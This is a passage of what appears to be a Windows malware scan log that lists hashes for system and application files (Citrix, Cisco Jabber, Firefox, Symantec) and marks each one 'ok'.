15:34:00.0718 0x04bc  C:\Windows\System32\QUTIL.DLL - ok
15:34:00.0720 0x04bc  [ 62AEBD526116896DD0761A7CEA5DF405, C1F5530E5D3E27DF727D82D12A37C6E553A2EC6BD47F59ABC8CA7D18EB99F0C2 ] C:\Windows\SysWOW64\atiumdag.dll
15:34:00.0720 0x04bc  C:\Windows\SysWOW64\atiumdag.dll - ok
15:34:00.0722 0x04bc  [ 833CE421B36A78B3442A0865C595899D, 570A1160654A0A417B100AE00CFD618F7E86920D26B5DA12DC656774DA95DA35 ] C:\Windows\System32\cscobj.dll
15:34:00.0722 0x04bc  C:\Windows\System32\cscobj.dll - ok
15:34:00.0724 0x04bc  [ ECE11457E0BD22BDA34314C9FDDF23C4, C50A00977F1B89939A7C560B18E2EECA3307DF3F8F1F05619764882ECFA69CD7 ] C:\Program Files\Internet Explorer\sqmapi.dll
15:34:00.0724 0x04bc  C:\Program Files\Internet Explorer\sqmapi.dll - ok
15:34:00.0726 0x04bc  [ F7A256EC899C72B4ECDD2C02CB592EFD, 9C1AA9322E83CABB94AEA4375EAEB0C44700E1F33B8BE98649BA1DF4DDFAD326 ] C:\Windows\System32\bthprops.cpl
15:34:00.0726 0x04bc  C:\Windows\System32\bthprops.cpl - ok
15:34:00.0728 0x04bc  [ E0B340996A41C9A75DFA3B99BBA9C500, D029AD8ABBD2267B1E44DF5172B93C3F832B4C21F930F5512C24E800F5CE4F8B ] C:\Windows\System32\SearchIndexer.exe
15:34:00.0728 0x04bc  C:\Windows\System32\SearchIndexer.exe - ok
15:34:00.0730 0x04bc  [ C746F3BF98E92FB137B5BD2B8B5925BD, 67A8990F3D491D149E65C90042909259793C65E671DC953FDA1F7590FAC23D9E ] C:\Windows\System32\FXSST.dll
15:34:00.0730 0x04bc  C:\Windows\System32\FXSST.dll - ok
15:34:00.0732 0x04bc  [ 650CAEA856943E29F25A25D31E004B18, DCA63D2AF4C6F14B27EA006F200E58A5C13AC940A51947A40F668908A446CC4E ] C:\Windows\System32\FXSAPI.dll
15:34:00.0732 0x04bc  C:\Windows\System32\FXSAPI.dll - ok
15:34:00.0734 0x04bc  [ 2D5AAFECAEE330D8A57C53D5FCC44F5F, 7C17228A65853EFA6268750E44036B63BB9363EA22AEEC16E7594ACB5BC95367 ] C:\Program Files (x86)\Citrix\Receiver\Xerces-c_3_1.dll
15:34:00.0734 0x04bc  C:\Program Files (x86)\Citrix\Receiver\Xerces-c_3_1.dll - ok
15:34:00.0736 0x04bc  [ AC0B6D0C310CFC83FC56C3314A6945D3, E7FF1CD6B7E8F80D42EA5AF2E24314052BE99E72B22B60BBF20EBFB625216133 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\836e10dfd0811b303553216f5cb092ef\System.Drawing.ni.dll
15:34:00.0736 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\836e10dfd0811b303553216f5cb092ef\System.Drawing.ni.dll - ok
15:34:00.0738 0x04bc  [ DDC9F72CC2B06C8D72681CBC89962C74, 0DE7801CC8EC30AE1D259AD2D82A4A3AB2170C73E2DACEDED221AD71F9CCE09A ] C:\Windows\SysWOW64\atiumdva.dll
15:34:00.0738 0x04bc  C:\Windows\SysWOW64\atiumdva.dll - ok
15:34:00.0740 0x04bc  [ C8E8B8239FCF17BEA10E751BE5854631, CB869195E78AB613CEF50AE3B247F0E4E42F233A7AAF5B2BFC5ADEA2C45C5F8D ] C:\Windows\System32\FXSRESM.dll
15:34:00.0740 0x04bc  C:\Windows\System32\FXSRESM.dll - ok
15:34:00.0742 0x04bc  [ A92AF43DBA78B72FEBC6E720FF8C52BA, 47236542F10D384256750DE1E6939AE0C6FAA59B58FEEB17FFC5599E618421FF ] C:\Program Files (x86)\Citrix\Receiver\ResourceKeeper.dll
15:34:00.0742 0x04bc  C:\Program Files (x86)\Citrix\Receiver\ResourceKeeper.dll - ok
15:34:00.0744 0x04bc  [ 3B9F046EF1004786AE732131837E3442, 476E42BB1B756EC393B269ECB96BE2FC0B0C702D28F3A58F7E846E4886558E6A ] C:\Program Files (x86)\Citrix\Receiver\NativeMessageBox.dll
15:34:00.0744 0x04bc  C:\Program Files (x86)\Citrix\Receiver\NativeMessageBox.dll - ok
15:34:00.0746 0x04bc  [ 3D94D76D663AE25989873819EEAB9A50, 1FD6624B9035FD2496FCE5F815C48A43EBAE46DE1D3C8A6462656C7B142B27E4 ] C:\Program Files (x86)\Citrix\Receiver\NativeSystrayUE.dll
15:34:00.0746 0x04bc  C:\Program Files (x86)\Citrix\Receiver\NativeSystrayUE.dll - ok
15:34:00.0748 0x04bc  [ 1B6556B8554940E453E38670286438C6, AA8B86B595140C666802D8A8D9AD4D2EEB8AE0CED551C4CD6C3DFACFAF73E620 ] C:\Program Files (x86)\Citrix\Receiver\ProgressNotification.dll
15:34:00.0748 0x04bc  C:\Program Files (x86)\Citrix\Receiver\ProgressNotification.dll - ok
15:34:00.0751 0x04bc  [ EB697CEF316191C9884D9B3658340427, 1E170A555C790CBBB77DD9798E876FAD6BDF12336E47D1B3CA37F09C196D4E24 ] C:\Program Files (x86)\Citrix\Receiver\Toaster.dll
15:34:00.0751 0x04bc  C:\Program Files (x86)\Citrix\Receiver\Toaster.dll - ok
15:34:00.0753 0x04bc  [ 2BA62D514C0481A5F9B72987CE0566A8, F91ED59CBA04C4619F05B4AE20C39C47B1D97AA669787A2C616A7B866E9856D2 ] C:\Program Files (x86)\Citrix\Receiver\WindowsAppRHelper.dll
15:34:00.0753 0x04bc  C:\Program Files (x86)\Citrix\Receiver\WindowsAppRHelper.dll - ok
15:34:00.0755 0x04bc  [ 8569E35D00F45972E506502EEE622BA4, 01FE851C03DB88C8373099C279F995A559D962B08932E193032FA3EAD522FB01 ] C:\Windows\System32\srchadmin.dll
15:34:00.0755 0x04bc  C:\Windows\System32\srchadmin.dll - ok
15:34:00.0757 0x04bc  [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] C:\Windows\System32\FXSSVC.exe
15:34:00.0757 0x04bc  C:\Windows\System32\FXSSVC.exe - ok
15:34:00.0759 0x04bc  [ 3E099BCDDA4D167BED6928281B3C5C26, A4772DDDF30AB712D4C97076447CE81BDBC78A19B1D8A49F7BB52801D2835553 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\1453d9e9a4989833ef3db4b22549ba1a\System.Windows.Forms.ni.dll
15:34:00.0759 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\1453d9e9a4989833ef3db4b22549ba1a\System.Windows.Forms.ni.dll - ok
15:34:00.0761 0x04bc  [ 22EDF349ABFB29E711E51DB0295A25DE, 6FCB7E1E0F2AC8593391DEA2CA159A922A7346A131C86ADF2B53DFB309167FD0 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\94bbd298ec8575f3c6151a59538a109c\WindowsBase.ni.dll
15:34:00.0761 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\94bbd298ec8575f3c6151a59538a109c\WindowsBase.ni.dll - ok
15:34:00.0763 0x04bc  [ 10F9D82ADD24CB2D1A792A2F248A35FF, 8F1AA2836CA2C2D7FCAAE84D21A86F6DCE720A8E4DAAC69087A50A367A5DDC2E ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700StartupCommon.dll
15:34:00.0763 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700StartupCommon.dll - ok
15:34:00.0765 0x04bc  [ B187B8750D62693BB63CF1B3E2CE30EC, 4749AD82FF79135F2F7821ABF61516AC78EFD1465A02C66F8265946EE70F99A5 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\UC700\a272682fe499cd2762d2ed41ab8f32da\UC700.ni.exe
15:34:00.0765 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\UC700\a272682fe499cd2762d2ed41ab8f32da\UC700.ni.exe - ok
15:34:00.0767 0x04bc  [ 589DF683A6C81424A6CECE52ABF98A50, 8CE0D07B2FC1F1BF8C07434FAFCDC63FDD3B75007C3B2EED130DB69D2D16E90A ] C:\Windows\System32\tquery.dll
15:34:00.0767 0x04bc  C:\Windows\System32\tquery.dll - ok
15:34:00.0769 0x04bc  [ F27763800CE191CB5EFF9AE204B2338C, EB017E347935BFCA16E3A2A2BE2B6C1434ED56E84F80536D4781B164FCA48B41 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\006d28e7c86f3e70db90ce06ea2f33fb\PresentationCore.ni.dll
15:34:00.0769 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\006d28e7c86f3e70db90ce06ea2f33fb\PresentationCore.ni.dll - ok
15:34:00.0771 0x04bc  [ 7568CC720ACE4D03B84AF97817E745EF, 7155144CB0B260B969C398A36BC277C97BEADB5DB137D19A4F7E5AF61C3E24D4 ] C:\Windows\System32\mssrch.dll
15:34:00.0771 0x04bc  C:\Windows\System32\mssrch.dll - ok
15:34:00.0773 0x04bc  [ 3121A79D13A61562BE9CC902CD46B542, 00A5833A48338A4A9A5530844924AF4F1FAB618DA46D7EBBC6E2165C32ED376C ] C:\Windows\System32\msidle.dll
15:34:00.0773 0x04bc  C:\Windows\System32\msidle.dll - ok
15:34:00.0775 0x04bc  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] C:\Windows\System32\netman.dll
15:34:00.0775 0x04bc  C:\Windows\System32\netman.dll - ok
15:34:00.0777 0x04bc  [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] C:\Windows\System32\qmgr.dll
15:34:00.0777 0x04bc  C:\Windows\System32\qmgr.dll - ok
15:34:00.0778 0x04bc  [ D2155709E336C3BC15729EB87FEC6064, 682A84C0F2D892E7A6CEE4E5937B4799E352AAE3B71E7037F2A343373467443C ] C:\Windows\System32\rasdlg.dll
15:34:00.0778 0x04bc  C:\Windows\System32\rasdlg.dll - ok
15:34:00.0780 0x04bc  [ 69C85737F4CA5634E7A19B818579D176, EC83E3B10C21628DECA8EFE54FDA4D84E40E7DF687ED164E9BF7CA35E2A5027F ] C:\Windows\SysWOW64\dxdiagn.dll
15:34:00.0780 0x04bc  C:\Windows\SysWOW64\dxdiagn.dll - ok
15:34:00.0782 0x04bc  [ 29409ED7400CA5BCCC30C0EE5147A60D, FCC41E4308A1648CE810105AACED08295C53E25178D6C40C9DF61E9397C579D6 ] C:\Windows\System32\bitsperf.dll
15:34:00.0782 0x04bc  C:\Windows\System32\bitsperf.dll - ok
15:34:00.0784 0x04bc  [ D9431DCF90B0253773F51FDEFE7FD42F, E53C40CC0EC603CF67305F0AA81389124CF6E709A22DABF13563CBAD15897422 ] C:\Windows\System32\bitsigd.dll
15:34:00.0784 0x04bc  C:\Windows\System32\bitsigd.dll - ok
15:34:00.0786 0x04bc  [ 2DF29664ED261F0FC448E58F338F0671, 4EFE79C383D0AF126FC4EE668D822563F8F037B1E61D73747A35FE11AAFDB8CE ] C:\Windows\System32\mprapi.dll
15:34:00.0786 0x04bc  C:\Windows\System32\mprapi.dll - ok
15:34:00.0788 0x04bc  [ D4F264FE23F8953D840904418220C15E, 72EAF30265A0CC88DEC0FCA7869734D8C93572457C61A2BF1BDFFB20C061DBCD ] C:\Windows\SysWOW64\dxgi.dll
15:34:00.0788 0x04bc  C:\Windows\SysWOW64\dxgi.dll - ok
15:34:00.0789 0x04bc  [ F9AFD12BB4B1CFA5FCC0A5B37C604FD2, E8ACB693B1A78FAEF292111BE3F9B10BA95C76833C06C931A08EAAAE39A21334 ] C:\Windows\System32\dot3api.dll
15:34:00.0789 0x04bc  C:\Windows\System32\dot3api.dll - ok
15:34:00.0791 0x04bc  [ 96DB78C9C50CEED9DA5050EFFEE272A2, 51CF3E1F96555A4E4B5BC0DE2598CE5A0199F495644A91C2105F25A5A4CF10E3 ] C:\Windows\System32\upnp.dll
15:34:00.0791 0x04bc  C:\Windows\System32\upnp.dll - ok
15:34:00.0793 0x04bc  [ 8504944851DF6175CC489A8F3328459E, DDC2F6DBA537E188DE53EBFDC5CC943F1468EAFC9FB3000929CE75072454BF9E ] C:\Windows\SysWOW64\d3d10.dll
15:34:00.0793 0x04bc  C:\Windows\SysWOW64\d3d10.dll - ok
15:34:00.0795 0x04bc  [ 0D753307D274F3688BD21C377B616700, 5DD08E77A11F2561FB96BA212FDDFE21D4394C69C34C3EB88F7F5CD068EE55BF ] C:\Windows\System32\eappcfg.dll
15:34:00.0795 0x04bc  C:\Windows\System32\eappcfg.dll - ok
15:34:00.0797 0x04bc  [ E4FCA0F99A41E460C84016DEFD31E6EF, 8EB14AF2025EADC7C86280E8417D8F286E8271B4F88B31696E33DFD72B3A0EF2 ] C:\Windows\System32\wlanhlp.dll
15:34:00.0797 0x04bc  C:\Windows\System32\wlanhlp.dll - ok
15:34:00.0799 0x04bc  [ 49BA0CAAA0668976382ABB600870129C, EC54DF5B296BC5EDFD1C3EACE37B4D472AA5D0FF1D92401EA81C9FA086B411D3 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\237d509a79aeef6e4635b09450d98f2a\System.Configuration.ni.dll
15:34:00.0799 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\237d509a79aeef6e4635b09450d98f2a\System.Configuration.ni.dll - ok
15:34:00.0801 0x04bc  [ 73FCB7919DEE80EE556F2E498594EBAE, D0F7A0AD3BC33263E9C2CF9787DD326436F9E0C9F5031D769F8A43C64C08A762 ] C:\Windows\System32\onex.dll
15:34:00.0801 0x04bc  C:\Windows\System32\onex.dll - ok
15:34:00.0803 0x04bc  [ FB3F036EF6A467F7AF46C821FF5D198D, 1291C3E5CCDE87C813DD8AEF8703667BE0DDD9FF485148CC43B23CA328984D3D ] C:\Windows\SysWOW64\d3d10core.dll
15:34:00.0803 0x04bc  C:\Windows\SysWOW64\d3d10core.dll - ok
15:34:00.0805 0x04bc  [ EF4248D28C2940AE6D46470AC2479A4F, 7C0DBCED93823E918A3DB9785E68A24743DECB03D378F1AEDCB0BF9705B4AC9A ] C:\Windows\System32\msisip.dll
15:34:00.0805 0x04bc  C:\Windows\System32\msisip.dll - ok
15:34:00.0807 0x04bc  [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] C:\Windows\System32\ssdpsrv.dll
15:34:00.0807 0x04bc  C:\Windows\System32\ssdpsrv.dll - ok
15:34:00.0809 0x04bc  [ 6E74D0AE00231D87CD213CD7BDC27E37, 29BD01036687B16670DECB1720592B7F2EA75C359784D4F89663D7B8523DF9C2 ] C:\Windows\System32\wshext.dll
15:34:00.0809 0x04bc  C:\Windows\System32\wshext.dll - ok
15:34:00.0811 0x04bc  [ 65522E77A1360DBC8D199DA3BF5EFFE4, E9D748070FA478A3D37F15049F998D340885C0DC5FCE03BFCE5D521C9EBA7350 ] C:\Windows\System32\eappprxy.dll
15:34:00.0811 0x04bc  C:\Windows\System32\eappprxy.dll - ok
15:34:00.0813 0x04bc  [ F56C460521AEE55467EA2B67C5465C8B, 73D58B7B61B7AA6F59A23D4BCCA5E1C289F35D5FC1FC9E04CE3109E85AA69340 ] C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
15:34:00.0813 0x04bc  C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll - ok
15:34:00.0814 0x04bc  [ 6DE66FE7C526637E74CD066461C7C871, 7E8980A3751762180D795EAC38458303BEAF8D1F85AB5F2D10D9CE7013090CBE ] C:\Windows\SysWOW64\d3d11.dll
15:34:00.0814 0x04bc  C:\Windows\SysWOW64\d3d11.dll - ok
15:34:00.0816 0x04bc  [ 5DA219F57A9076FB6FBD3C9C3713A672, 274FE616625B336D81841FDC752C8053D4CD6926565B899760D298D145CBA1A3 ] C:\Windows\System32\WWanAPI.dll
15:34:00.0816 0x04bc  C:\Windows\System32\WWanAPI.dll - ok
15:34:00.0819 0x04bc  [ 62C7AACC746C9723468A8F2169ED3E85, 40E901F3EAFE52DF11D6BC4EF0E79F666EBDACE0B3C090CAD2358076E893EA47 ] C:\Windows\System32\wwapi.dll
15:34:00.0819 0x04bc  C:\Windows\System32\wwapi.dll - ok
15:34:00.0821 0x04bc  [ 6B851E682A36453E1B1EE297FFB6E2AB, A641D3FD9463C4788B45B8B5584EA4489C1F63A71B4B595AE85FF3482CD5EDA6 ] C:\Windows\System32\QAGENT.DLL
15:34:00.0821 0x04bc  C:\Windows\System32\QAGENT.DLL - ok
15:34:00.0823 0x04bc  [ 98AF3A8430A1D01A14F2F8C48C03013B, 260053A3414FED281BB1D2F62268FFF492264681D9307BADC9A001AF5684BFE1 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\3646375313dd2b8e3afecbf945960336\PresentationFramework.ni.dll
15:34:00.0823 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\3646375313dd2b8e3afecbf945960336\PresentationFramework.ni.dll - ok
15:34:00.0825 0x04bc  [ FB104D17018B4CA9F0C1A9BED02D15FC, 6DFC0EB63BE09741496137B84B9A54F0D6B87A718E2CDC1615872DFB49FA6202 ] C:\Program Files (x86)\Mozilla Firefox\firefox.exe
15:34:00.0825 0x04bc  C:\Program Files (x86)\Mozilla Firefox\firefox.exe - ok
15:34:00.0827 0x04bc  [ ACE1BB07E0377E37A2C514CD2EC119B1, A9AFA4774DFA875496764D6E541A6333A3ACD3C5D2BBEF753C2D80BA83B4AC15 ] C:\Windows\System32\mssprxy.dll
15:34:00.0827 0x04bc  C:\Windows\System32\mssprxy.dll - ok
15:34:00.0829 0x04bc  [ 3C1936A12C62254F914A01BBC6A8DC69, 0068F7A8B0D9E9776B44EAD99007B0CE5A5600633F2B477E9EFAAC644408C70E ] C:\Windows\SysWOW64\d3d10_1.dll
15:34:00.0829 0x04bc  C:\Windows\SysWOW64\d3d10_1.dll - ok
15:34:00.0831 0x04bc  [ D4212AB475A3B25EC4DF574536C3EDC5, F8BBEECB66BA6DDE5A64ED41D8BF95A1C81470552B4BFD5B11D888156289CCDD ] C:\Windows\SysWOW64\d3d10_1core.dll
15:34:00.0831 0x04bc  C:\Windows\SysWOW64\d3d10_1core.dll - ok
15:34:00.0832 0x04bc  [ C9FB9038B15036CA28CF0B4BE2BED9BD, 0F56384E798B3F725FFEFC6E31A980DA31F620DB847F601273EF19E8CE74A226 ] C:\Windows\System32\en-US\tquery.dll.mui
15:34:00.0832 0x04bc  C:\Windows\System32\en-US\tquery.dll.mui - ok
15:34:00.0834 0x04bc  [ 198552AEFECA69D646867EC8D792DE95, 6978D5205387391748EE7E9FACF1AE607C37FBFD83B77CB632DD772F8D71A165 ] C:\Windows\SysWOW64\ddraw.dll
15:34:00.0835 0x04bc  C:\Windows\SysWOW64\ddraw.dll - ok
15:34:00.0837 0x04bc  [ B7F9CD973E007DDF3B97209B237B0575, 586AA5E24E109C34C5E50B5340E4458552C002D44B506853730237C3CD892E56 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginRuntime.dll
15:34:00.0837 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginRuntime.dll - ok
15:34:00.0839 0x04bc  [ 35FD33EAE23AF69715EE3231A9F15B82, C7351F3537F4B938E4E8A8A8DD59039298F9B09678A4BC09B2A362DC4B25E2C0 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrobat_sl.exe
15:34:00.0839 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrobat_sl.exe - ok
15:34:00.0841 0x04bc  [ E601860AA04CE2198DBC6AC2AF80AFF7, B9D2BAEF2F6F8EA687414E73DFC5207F11A406D53C3444FCDAFD9CE1B4940053 ] C:\Windows\System32\perfos.dll
15:34:00.0841 0x04bc  C:\Windows\System32\perfos.dll - ok
15:34:00.0843 0x04bc  [ AC5DF873913B00E554D8F553459BC431, 86FC6E15BD67AEB714E44C088EDA1C17BAC25A1EC67A518A05878D594F293394 ] C:\Windows\System32\qmgrprxy.dll
15:34:00.0843 0x04bc  C:\Windows\System32\qmgrprxy.dll - ok
15:34:00.0845 0x04bc  [ 85B45B4B285B159ACDB355FC8C1E8925, EBB4A5472306A284D3A845347E2A79B13EFCCBA86705E1D49DE8AC44D8D06112 ] C:\Windows\SysWOW64\qmgrprxy.dll
15:34:00.0845 0x04bc  C:\Windows\SysWOW64\qmgrprxy.dll - ok
15:34:00.0847 0x04bc  [ EC77ACE51D7166D2FF1BAF49964DC7CB, BB06B6436E78ADAAAB5F3E038B7EB36A862A9ADEC39C73378E6F488CA96FFB02 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\TrstZone.dll
15:34:00.0847 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\TrstZone.dll - ok
15:34:00.0849 0x04bc  [ 0E85C11F8850D524B02181C6E02BA9AE, 8703566931067CCF949E9779E4D328DD21210329DD687459300C83DDD06390A8 ] C:\Windows\SysWOW64\dsound.dll
15:34:00.0849 0x04bc  C:\Windows\SysWOW64\dsound.dll - ok
15:34:00.0851 0x04bc  [ 6118105F2D09953430437F9BF05BD704, BD3D2EE12022B36B1AB09CFA458D8F08D8A31210D28283EB81F4039E92662017 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\8b133e0d94535a7534719f70873ca7fe\System.Xaml.ni.dll
15:34:00.0851 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\8b133e0d94535a7534719f70873ca7fe\System.Xaml.ni.dll - ok
15:34:00.0853 0x04bc  [ 3E0B83A2EB2C5737A42D7A11B97C592F, 7FAD641BE0AB7F614673599D33F452E1906E0F2E2407F5AB08F5A580F6527E58 ] C:\Windows\SysWOW64\atiuxpag.dll
15:34:00.0853 0x04bc  C:\Windows\SysWOW64\atiuxpag.dll - ok
15:34:00.0855 0x04bc  [ 07AB6425A0A193B71E9E5C313AAF99F5, ED367ECFEF40AB67DA660795F79C4E8FECDC01BFFC96EC66E15F68E9C8773056 ] C:\Windows\SysWOW64\atidxx32.dll
15:34:00.0855 0x04bc  C:\Windows\SysWOW64\atidxx32.dll - ok
15:34:00.0857 0x04bc  [ 1C0E369575F387460E2A5F28269B2CC4, 96F26EF7483F9EB7B79DFCF50BB0261B981322BF8FB9F239D617FEACCEC466C8 ] C:\Windows\SysWOW64\DWrite.dll
15:34:00.0857 0x04bc  C:\Windows\SysWOW64\DWrite.dll - ok
15:34:00.0859 0x04bc  [ 67EC459E42D3081DD8FD34356F7CAFC1, 1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067 ] C:\Program Files (x86)\Mozilla Firefox\msvcr100.dll
15:34:00.0859 0x04bc  C:\Program Files (x86)\Mozilla Firefox\msvcr100.dll - ok
15:34:00.0861 0x04bc  [ 9AC4958F3FEC8721CA9E1C29123E6A83, 228F0F5648D6AAEE580523C192CCDBFFA31A6B861B68ED3894EDC1FFF57BB40A ] C:\Program Files (x86)\Mozilla Firefox\mozglue.dll
15:34:00.0861 0x04bc  C:\Program Files (x86)\Mozilla Firefox\mozglue.dll - ok
15:34:00.0863 0x04bc  [ 03E9314004F504A14A61C3D364B62F66, A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F ] C:\Program Files (x86)\Mozilla Firefox\msvcp100.dll
15:34:00.0863 0x04bc  C:\Program Files (x86)\Mozilla Firefox\msvcp100.dll - ok
15:34:00.0865 0x04bc  [ DFD6A68417DB8DFC240CE2660501BFCD, 9EC9238FFB49B0712A2AA94B589A7F4A79B436AFB5AB123D247EB884C65A72F5 ] C:\Program Files (x86)\Mozilla Firefox\nss3.dll
15:34:00.0865 0x04bc  C:\Program Files (x86)\Mozilla Firefox\nss3.dll - ok
15:34:00.0867 0x04bc  [ CED988E5402D0431DCD4437DB6A623A7, 7C7016E4E409E6CF3981CD7D9E0D3CA9E53747A55A290A0B5E66CCDF942B83E8 ] C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
15:34:00.0867 0x04bc  C:\Program Files (x86)\Mozilla Firefox\mozjs.dll - ok
15:34:00.0869 0x04bc  [ 3EA1714A1F0271DD0687301FE93958A4, 2C3FBE1A3FE4117BB31682D49181450FB0F6B769584A2DE78E3CF441951160C4 ] C:\Program Files (x86)\Mozilla Firefox\icuin52.dll
15:34:00.0869 0x04bc  C:\Program Files (x86)\Mozilla Firefox\icuin52.dll - ok
15:34:00.0871 0x04bc  [ 76C2A3B47FE220E027697CDEF63A72C9, 6C2ECAD3DEB1410E3AEE506EF23562DBCFBE4C3BB3CD5C3CE3A660FA24262F91 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\wpfgfx_v0400.dll
15:34:00.0871 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\wpfgfx_v0400.dll - ok
15:34:00.0873 0x04bc  [ 955761D428935DA2CFF98CF11F3B8554, D3FB79991B9A3EA6EAB3CEAB1BD83F364077B20D9DF6CB9FBCDAF9763E028496 ] C:\Program Files (x86)\Mozilla Firefox\icuuc52.dll
15:34:00.0873 0x04bc  C:\Program Files (x86)\Mozilla Firefox\icuuc52.dll - ok
15:34:00.0875 0x04bc  [ 88B0C4D9B85E33BDFDE7031EFF2A506E, 89E9F0D2B646AB2465911F1FFF2F91A103788FA549A3949E813E4590F7950803 ] C:\Program Files (x86)\Mozilla Firefox\icudt52.dll
15:34:00.0875 0x04bc  C:\Program Files (x86)\Mozilla Firefox\icudt52.dll - ok
15:34:00.0877 0x04bc  [ 3C46868A3DD3E7A0B84BAFD6C1BB4177, 3B78B4DE910A8028C76966E5C6275F9ACCB464D911687152CA4C7D986FD42FC2 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ServicesFramework.dll
15:34:00.0878 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ServicesFramework.dll - ok
15:34:00.0880 0x04bc  [ AE839020FEE052598F096942C8002C73, 9F0520B75EE30E2AD6BFA46C7D52782A8A9515AA6D14579DEF2F9D222EC57083 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationNative_v0400.dll
15:34:00.0880 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationNative_v0400.dll - ok
15:34:00.0882 0x04bc  [ 390745A1F19EC60771B8BF6DF1475160, 51176DA3395443F070775F93F8D03E4FDA0925394A7141AA7DD9F98D523278D4 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberCoreUiPlugin\JabberCoreUiPlugin.dll
15:34:00.0882 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberCoreUiPlugin\JabberCoreUiPlugin.dll - ok
15:34:00.0884 0x04bc  [ 40499B95D0CE61A38296A5B93CAB6453, 4F4D7E245D631B9764BEA5BD39B8F98775DF420AE24A19D8B04E747E96B03CB4 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginResources.dll
15:34:00.0884 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginResources.dll - ok
15:34:00.0886 0x04bc  [ 3AD3602258590F5A3C45DC7A029D0140, 7428C3747AA6EFB48C596041B5EB76ABB2AF6A28BE105775852D2305C067ADE0 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
15:34:00.0886 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll - ok
15:34:00.0888 0x04bc  [ DC750C0E15C6EBA385A05F8753BF3B79, 14EED622B9CF9018FA690949265346C3AF29F70BD4EF574508B051A08ADADF01 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginUtils.dll
15:34:00.0888 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginUtils.dll - ok
15:34:00.0890 0x04bc  [ E4822D2375806F4D5B51F2B569889D34, F34D875C808029F0C94ACC824AC8C278E5EABF280DF045D22BD16B30CA117C10 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\UC700StartupCommon\a1ad9252ab6fd2924e3c462331ea6754\UC700StartupCommon.ni.dll
15:34:00.0890 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\UC700StartupCommon\a1ad9252ab6fd2924e3c462331ea6754\UC700StartupCommon.ni.dll - ok
15:34:00.0893 0x04bc  [ 547A0FF564D0B61ABAA10FBC22041C96, CF8ABB4968ABFE06A48637CF3240322271343E57475EE9F316B0FCA2D6C0020F ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CEB.dll
15:34:00.0893 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CEB.dll - ok
15:34:00.0895 0x04bc  [ 29DB6815687A524C87DD2ABBB0E05938, 5C3C7E33751A7E40FB6A3245E2FC8B0F4AED2D2E220BB39E7554C159B590235B ] C:\Windows\System32\atiu9p64.dll
15:34:00.0895 0x04bc  C:\Windows\System32\atiu9p64.dll - ok
15:34:00.0897 0x04bc  [ 71ECC01F9928873A5DEB5B475C0F2429, 608B7D5EFB980CBCC519A039C85EF86E4DD12CCFCA6884675615BBE6DAAF6582 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
15:34:00.0897 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll - ok
